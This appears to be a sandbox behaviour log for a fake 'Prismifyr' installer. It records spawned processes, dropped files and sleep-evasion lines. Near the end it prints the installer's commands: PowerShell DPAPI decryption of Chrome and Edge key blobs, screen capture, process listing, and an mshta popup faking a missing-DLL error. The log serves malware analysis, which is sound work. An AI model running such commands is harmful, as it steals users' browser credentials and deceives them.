Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeMemory allocated: D90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeMemory allocated: 1A6F0000 memory reserve | memory write watch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3227
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3851
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4274
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 719
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\StdUtils.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\elevate.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\d9f7e9ec-5589-4098-b546-c97c7020ff02.tmp.nodeJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\System.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1b6e99aa-5e17-4930-922d-0fcfed46e003.tmp.nodeJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\SpiderBanner.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\libEGL.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4036Thread sleep count: 3227 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4036Thread sleep count: 3851 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7148Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3424Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5980Thread sleep count: 4274 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 280Thread sleep count: 719 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3392Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe TID: 7132Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059CC
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\localesJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resourcesJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modules\screenshot-desktop\libJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modulesJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpackedJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modules\screenshot-desktopJump to behavior
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: bCK1sK9IRQq9qEmUv4RDsNuESgMjGWdqb8FuvAY5N9GIIvejQjBAMA8GA1UdEwEB/wQFMAMB
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2278954943.0000000006B20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2278954943.0000000006B20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: (IsLinux() && isVMWare) || (IsAndroid() && isNvidia) || (IsAndroid() && GetAndroidSDKVersion() < 27 && IsAdreno5xxOrOlder(functions)) || (!isMesa && IsMaliT8xxOrOlder(functions)) || (!isMesa && IsMaliG31OrOlder(functions))
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2397315857.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmncVMware Screen Codec / VMware Videovp5On2 VP5vp6On2 VP6vp6fOn2 VP6 (Flash version)targaTruevision Targa imageimage/x-targaimage/x-tga
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2278954943.0000000006B20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ZAMDARMAppleBroadcomGoogleIntelMesaMicrosoftNVIDIAImagination TechnologiesQualcommSamsung Electronics Co., Ltd.VivanteVMwareVirtIOTest n
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2397315857.0000000005223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Screen Codec / VMware Video
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeAPI call chain: ExitProcess graph end nodegraph_0-3407
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeMemory allocated: page read and write | page guard
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /fo csv"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Prismifyr_Installer_v2.1" --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2244,i,14912361022600860785,9095772362069922900,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Prismifyr_Installer_v2.1" --field-trial-handle=2516,i,14912361022600860785,9095772362069922900,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2512 /prefetch:3Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png" "Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()""Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /fo csvJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser')
